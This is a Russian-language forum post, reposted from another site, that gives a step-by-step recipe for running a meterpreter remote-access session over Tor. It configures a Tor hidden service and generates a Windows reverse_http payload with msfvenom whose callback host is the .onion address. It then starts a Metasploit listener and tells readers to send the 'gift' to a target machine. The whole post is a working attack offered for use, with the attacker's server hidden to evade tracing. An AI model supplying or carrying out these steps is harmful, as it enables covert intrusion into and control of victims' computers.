Наткнулся на интересную статью, тут не нашёл решил продублировать, источник указа в конце поста. Эта тема для тех кто искал но не находил решение вопроса - а как же пустить сессию meterpreter через сеть тор Требования: Metasploit tor (Expert Bundle) Созданный сайт в сети tor Не много терпения и капельку мозгов Устанавливаем Metasploit если его еще нет! Скачиваем tor: apt install tor Заходим в файл конфигурации "torrc": nano /etc/tor/torrc Находим и раскомментируем строчки до вида: HiddenServiceDir /var/lib/tor/hidden_service/ HiddenServicePort 80 127.0.0.1:9999 Перезапускаем сервис: sudo service tor restartsudo service tor restart Узнаем полученный домен: sudo cat /var/lib/tor/hidden_service/hostname Я думаю что для многих понятно что этим мы создали свой сайт в сети tor. Теперь перейдем к metasploit'у. Создадим наш вредоносный полезный файл: msfvenom -p windows/meterpreter/reverse_http LHOST=*******************.onion.link LPORT=80 -o payload.exe -f exe Вместо звёздочек вводим полученную нами .onion ссылку. Важно что бы ссылка заканчивалась на .onion.link .onion.link - этот сайт перебрасывает вас в сеть тор без дополнительного ПО Запустим слушателя: use exploit/multi/handler set PAYLOAD windows/meterpreter/reverse_http set LHOST 192.168.1.1 (Не обязательно что будет такой же ) set LPORT 9999 exploit Отправляем наш подарок на машину и ждем сессию. Надеюсь что тема хоть кому нибудь пригодиться)